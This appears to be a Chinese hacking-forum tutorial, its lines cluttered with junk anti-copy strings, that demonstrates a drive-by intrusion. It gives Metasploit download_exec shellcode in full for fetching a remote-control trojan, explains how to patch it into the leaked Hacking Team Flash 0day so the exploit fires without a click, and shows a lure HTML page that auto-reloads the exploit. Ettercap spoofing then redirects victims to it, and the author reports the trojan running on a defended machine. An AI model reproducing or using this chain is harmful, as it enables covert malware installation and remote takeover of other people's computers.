|
; W8 u0 Y7 O2 X% a8 d8 @ 三、flash 0day之手工代码修改制作下载者实例入侵演示 2 a, Y* }: u7 j6 \% k, o& \! {
; n: [: c9 [5 X% {5 C
* d# s# u4 s' N" g 利用到的工具: $ j* c) \! K+ ?5 }4 D
, k- o4 G4 B4 ?; @' N1 v8 s% E' w3 N Z, N9 i/ x# ?
Msf
# d1 x" F" T1 X: T4 T2 v9 e& v 7 i* p( O; K* [0 H9 a# P- o
/ u* D& s; A% | t
Ettercap 1 p* B/ v' e) E, G! B0 q
; |4 Y8 G9 ]) A( U
' r, y; i a* p Adobe Flash CS6
/ }% D, L/ K+ p : L! C" J4 F6 N9 K' C8 Y2 Q p
% {$ a6 ]' ^3 ]1 O* P/ o4 H
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 $ u6 O. o/ i/ m( j& n7 d- `: R5 a
|: }% I& ^! I } O* v
1 V+ ~4 e/ C6 j& m 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options $ h4 L4 f7 F% W8 x* F) M
' ~% H' V1 H8 F
& G: Q6 D. X' B: L7 f U% B2 Y* d
如图: ( G" m t4 }, z' ^% J3 o n; y2 Y1 e
! e- o0 F% N% I) L& Z* H
7 w) ^/ [+ y) p$ H
: j8 E$ P3 W/ H1 x
4 H5 G! N, U# L8 f J% m# N8 S" `/ ?# u% h f! `
0 n2 s& d6 P( O- k( |, O! A5 t
8 [" l2 L5 I! G& a8 T
5 U% z8 b8 t" x b& _5 [ 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 0 a a( p, S6 f3 X8 T, g
4 y# o; V9 G* H% Y
2 \* o$ ^ }# w% ~2 Y
( G5 b2 g! Q6 }: d8 X2 e! e
8 ~4 Y( y. |1 a
% R, K/ {' u6 c " I4 \2 C8 }7 a' D2 b
& B+ Y7 E1 z0 S7 f; @, @
% G, w ?8 z% O& v 然后执行generate -t dword生成shellcode,如下:
* {( k: N9 F: s& T 9 [% l! G* L, F: v
8 a) }* h" @+ D9 }
8 c# q% d9 P" ~! q. F $ v- `# Q( f O* X: J) V1 G
! q0 C3 N- K- E: m& e4 y/ x 复制代码到文本下便于我们一会编辑flash exp,如下: 5 l2 s" j% h. q: k. i- `3 {
) o# s8 y6 I; ?7 I
8 O% n) z+ ~/ @+ l) H8 r$ ^
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, & P2 I* N5 q' \- Y
* C0 k" T3 _( j0 P2 {3 _% d1 b7 U( A4 ]+ x+ R3 d+ B* c+ y' J$ C
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
: w/ e: W0 B1 j3 a4 [ 8 p: A6 `+ ^5 q/ d# |" m6 r. {
+ S' U# a4 I5 D% A
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
* W" a& o T8 k1 K3 S0 T * O8 | X/ ?) z( X( G o5 L2 n
% e) R) O; N8 l. ^/ i4 a
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
r2 e+ a0 i& @3 r! a' O- L) } 8 C9 N& Q B1 m- ?* H* r. L
' X E! q0 |. `$ X' E3 W! K 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, : G9 H+ ~( G1 C2 W" W% W+ @
0 \4 R0 O) h# V# [3 ?: J9 Y
- H* ?% _! p* _/ l 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
/ {1 j- }) i0 N) I5 ?* ]5 a ! u0 V3 l7 {$ Q( _1 B4 G: J
2 u& j' n7 _& J4 n! k( S 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
+ S' l; V# c- S% M8 {0 n8 V7 [$ l
{8 V8 G* W5 E( s' B {) W$ T; _
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
- Z: q4 `. `7 g8 t1 g
0 C: Q2 ]: _& k1 m1 ~5 y2 b$ L; x5 [! V3 G
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 5 X0 X, \7 W* K$ Y- o0 d c
$ r: v. m) s2 {0 g, h, t M
0 c/ h1 w5 h& z7 r J* n 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
9 n t" K, n, q. a" Z* Y
: f7 P+ y, V9 \) _( }, M/ g' W, k f1 }2 e" `2 w# T; P
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
* A5 b7 g$ |8 P; }9 ^
( K( B6 [) ^: h; _$ D. t9 E( ?/ c1 b. G( k/ w& m3 {
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
1 S2 H- E! F3 O% C- M ) ^" a% L c9 X$ D4 Y
& V0 m( [ e) z8 L* q 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
- S( S& |5 s- N' g' a' E 7 Z5 r1 ^7 h' \2 q) J b" ^
5 b8 S7 Z( q. [4 f5 d1 c i6 i 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ) F+ |/ ]+ m: [: M! J6 D
% O" z% W7 ~$ w3 k
+ `8 i. [; @' _9 M% V* O7 h9 v6 L 6 ~2 D, Q; \+ k+ ?5 q) r
: l, ?9 L& m- w% T O7 n* A+ l, w
9 Q7 t; K+ x$ Y% P5 d
8 P5 W! _# f0 p( L% m5 A
: q1 L3 c4 r4 r" w; L4 m 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
, [- r _" O0 O! r( R - r/ k4 K2 e5 E3 ^
, E' N n+ A* K' `6 P9 Y ( m4 E" W% S8 V1 ~* |
. u" l9 y6 C- p# h3 S& }7 C& ]
' A; s6 n& i1 D) G, I
先修改ShellWin32.as,部分源代码如图: 7 z L8 j, d; X
+ {2 y* ~" u- L6 k% Y" V
( F0 ?2 {* u! A+ ? 5 g. ]& O6 V; \4 b c0 J
* k3 \) Q0 \1 p3 W# X% K+ H
$ o5 B4 F% f# [) X! H3 W* j
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 0 H8 J1 ]5 g0 q- M- x; ^: u. l
! H! {7 Z* k$ Q* L
: Z5 Y4 q3 S0 m
8 h3 n) {. y* k3 V/ c7 H
7 F2 Z" V0 ~6 E6 a, ?; k& n6 N# g% N- S8 r, @
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: $ Y+ c3 S- l/ J0 l1 F4 v& l
. z; n: N! l& P/ J: ^6 s
+ K8 O) Q8 ?/ n5 |
, ^# P- I3 o% x$ J6 R/ u7 s1 @! A % F% L% l6 J4 _1 l+ Z1 f
$ _/ Q9 z" i% S. Q7 p+ D! _ 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
, Q: c$ g% m1 Z( A, Z 6 K- m0 f$ A7 T2 O
9 i# z0 d; E: R! G) M
, e% R1 ~4 |( V4 `3 v9 M8 b9 N% O. J % t: n% G1 y* |! l! @5 N
- u3 d5 i/ M) ?7 B) R % o1 [, l7 G: H( U6 ^3 e
9 f9 m4 I e( u; G
2 W F, y, ?; N; X& w u; f
% t' k3 y- g6 z* m 2 g3 y t5 M5 J" u2 G9 P9 e% Y' j
& m+ E2 } w. Q
然后点保存,下面我们来编译一下,打开 2 \. G' o% i- @' O
. J, k$ G! b0 v( f; k6 y+ p) K* S9 I, @3 Z1 p5 m
exp1.fla然后点文件-发布,看看编译没错误
( F5 X4 J9 l, k
8 K1 G5 C* ?1 [& Z
" l. j% M2 ^! ?6 J+ h
* o/ ~& K) t( W / S) X v/ g; k/ u) J
+ B+ g( _. Z* E$ X4 R
- v8 g0 o" w1 E ' O) J2 z ~0 S8 U" g0 E% t9 h4 J
3 W8 d9 X' i1 K/ k( @
( n, @5 O- z, X 6 X. g: [& `; X% }& B7 Q8 A
; J/ @3 e) Z1 a w : U- _1 v9 j3 P
, F9 i; U3 _5 @0 k# L
1 p! p: f. W; O 然后我们把生成的
7 s$ P m: E7 |6 A$ w1 p2 b7 D; G " m2 b, L* N& ]
g! v9 J+ C2 W4 m7 Q
exp1.swf丢到kailinux 的/var/www/html下:
L: ^- \5 y. G7 h
+ g$ }8 y- ?" h; b5 l3 M5 y" T* N5 r; | ]' V0 L! I% w& \: [
然后把这段代码好好编辑一下 3 ~/ f. N% L3 F, o8 C: a5 k7 g
* H# Q7 |& q: H: c9 E2 E# v+ y1 B4 h: P3 }9 E* V1 B+ C) n. ?
+ I) Q+ j% F* A7 b' A8 i( D* W( X3 N
/ d x7 n! i$ v
0 {& p/ Y" Q# I; j7 a
- ^1 B3 S7 a1 Q9 ]- Z" _' B
( t* }$ G$ Y% N6 K/ y6 g: A$ m% v/ j8 ], F# f, {
; B9 j* D+ t2 R& ?! Q/ P
8 Y! l7 x# l, Y6 B6 B& t
+ P. E% s2 A8 w, r# C3 W
4 y* s& M; T/ } y$ ]* N
5 {+ C R R/ Q5 i
! }+ T- Q- s5 |5 @7 t
5 _% M: U$ E0 V* d, C0 V
Q% p3 s$ S& ]
# \1 G: C# |8 @' x" |, y 6 y, O2 C8 f& n/ I8 F* k( T
3 n1 G% u. l* H& Q. X
$ Z) u7 I" `6 n! j- E" e* ` <!DOCTYPE html>
a8 r6 R: q$ ~: J! k9 Q" G2 z' z $ G6 r' a8 v5 y+ l! ^* y2 |
# O* S0 m; }( ^0 g/ G, [2 Z
<html>
" M E+ v! [; g" a2 U" c5 C, j0 J
}. Q+ b+ {7 s! Y! U% p* l4 J( d- K B
<head>
5 e. j0 T6 \- g) a( t* c) `* F , b8 E& E9 K j# A* R
8 R; _9 J D$ z
<meta http-equiv="Content-Type" content="text/html;
1 n2 M6 y4 y7 K9 W+ P6 r$ p * }( t1 N+ F8 H# B1 v
& X" T7 v" ?( Y; M' E charset=utf-8"/> + D0 o, O: g/ n5 ^/ m: |* I5 {$ Y
S# @1 s: s: o
* N0 i8 O( ]! c) g+ P, y2 f7 B </head> 1 V1 F2 k$ J: D+ n. m ], D: u
* E: b* B0 ~& Q/ O! l
" }6 n6 H( T- n* m0 T8 @/ d! F
<body>
# H) u1 @, r& c9 n ' J+ r! R3 H5 N$ h2 t, o0 M
; e. n6 ~7 i7 M' J- i6 } <h2> Please wait, the requested page is loading...</h2> " u. x8 o$ V) H7 c; S2 W: d
, [* d5 x# ^3 J6 H( U4 ` N, }! [; V6 ]+ W" C! ^+ w4 c) o( y
<br> , a3 {$ E6 ]8 {& h/ M0 L
, c, p$ A$ Z; q) _" C
4 d3 S8 U5 g; o* u2 {
<OBJECT ' D2 ?7 l7 B$ |' E
+ M& U/ v+ q3 V% u! M1 [4 g" M
' c* }' E" u2 C0 S! ~8 l& j, q& s classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie 9 q4 b. K* Z1 _5 Y
6 u0 Y' Q) \5 Z- A9 X r# S
- A. _ Q7 M- }9 V VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 4 ^0 w6 F! q/ q1 T
+ k) X" B& P' d0 g. i" `5 w+ l
9 d1 y+ Q2 E8 z2 O
</body>
0 ~$ o7 k2 P0 ?. ]$ P0 K ' d* q" E" }% ~
+ K6 u5 ?6 _& l$ T- Y: v <script>
6 {0 p) a( R1 Y4 {
# K [) _" ^; \6 \/ P4 |" c- z9 M6 h! c$ [9 ]- f3 x
setTimeout(function () {
8 D* `6 U$ K$ n9 u. G. [4 G 7 \1 D8 I- R c# o& {! p0 i
( ]! u9 r4 ?7 r3 o5 _0 f3 V a
+ [. g/ d, ~3 u- F3 q7 ^5 g / |! _: p9 S' l J* V0 f& \
0 n. N* p, @6 N: D( F7 w8 b: K
window.location.reload(); & v4 \& b% o9 n' D* G" r
; i6 F! a9 s# c( B) @5 n$ o4 g& x" \' F- C
}, 10000); 7 l8 e, V: h1 U, d3 B- u$ @. l
! f+ K* K4 C+ X% q$ I6 z& B" p: r7 Z0 d) V6 b3 \" z
# D$ j% s2 Q) p" L3 h, s7 Z7 J. B
3 W7 n5 S% y9 J3 m& G4 o9 [% x% o! ]9 i
</script>
) N1 c n' o3 R/ C- W3 {8 S/ ^. j I
/ ]1 y9 j9 g* z$ }. N- a7 W) H% b* c0 S+ k3 d5 Q; b
</html>
0 o* L$ ?1 Y' J0 K, w5 U. j) ^& g
- R+ c1 Q7 h9 X0 d2 d/ i
; R$ M" z# O* `% n% K) i( d0 i7 z! l 6 j! a; _7 l( }
, _6 ?2 g, T7 i" C4 l& z7 v
7 F* V3 g$ l3 r, C
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: * L. \8 U$ G9 A' H
) ~; ]/ D3 d. ^0 n( a6 @! S$ m7 n
: Q% v2 i' A7 s' {. k" `+ T& x- P, q
1 T# _: `' O9 G6 t; U2 U
0 g! O" b3 K% ]. Q. p/ a4 T5 }1 S/ k, |
- S$ I1 t! J. I D+ t
- `: A2 d7 w( i' S% v3 v2 @
4 `, _% G5 n, ]
( N4 Z. F0 f% R 5 s2 D. Z9 J, y! K. [* ~
) J7 Z# X7 L2 O: ~& t8 Q
x- \2 y, n2 {6 a. c
# u8 T' p& E; B7 Y @( M$ o; v1 H
9 S% M1 e$ j h1 N& [( @
/ Y7 b7 @* w$ \+ p% {) g 4 ?: O, |1 T' `8 g
1 j3 p" Z; |8 r( V$ W# {! u 下面我们用ettercap欺骗如图:
3 C& N3 k" @% p8 i0 m0 u! O
+ N! F2 A! a" ]& T4 j! k' ]9 N- X+ U$ s( B/ a1 q- E2 e
0 E1 B; g( u4 ~; g2 T, d3 R
( g9 n5 T e m6 s
3 M. Q v- y& Z C 7 e9 v* K B1 ]- E3 t- V
. _: D C; G4 y9 [& r6 W/ ]
$ k; n/ q9 x h
下面我们随便访问个网站看看: / g- S* l$ O B9 O: i
f% {% P' B! }2 d F+ k/ o- Z3 i7 ~* j) Z) d: @2 j
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ) v2 v6 o& H Z5 N1 U5 k: E$ h8 w
) z" ?6 [! t$ O
6 {8 u3 Z! D, [7 m& ^, Z
$ y y* c s8 J: n* v" M & S1 S* _9 K/ Q z" _/ a2 N
0 e# m! ~3 a# }3 v4 z" p 我们看另一台,
4 {$ h$ G: D. w+ G) `
l% f3 s; S( I ^7 P5 H) o9 j
- m3 t2 q( Y& \5 }! v* q 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 " z2 I3 E6 ^" z
|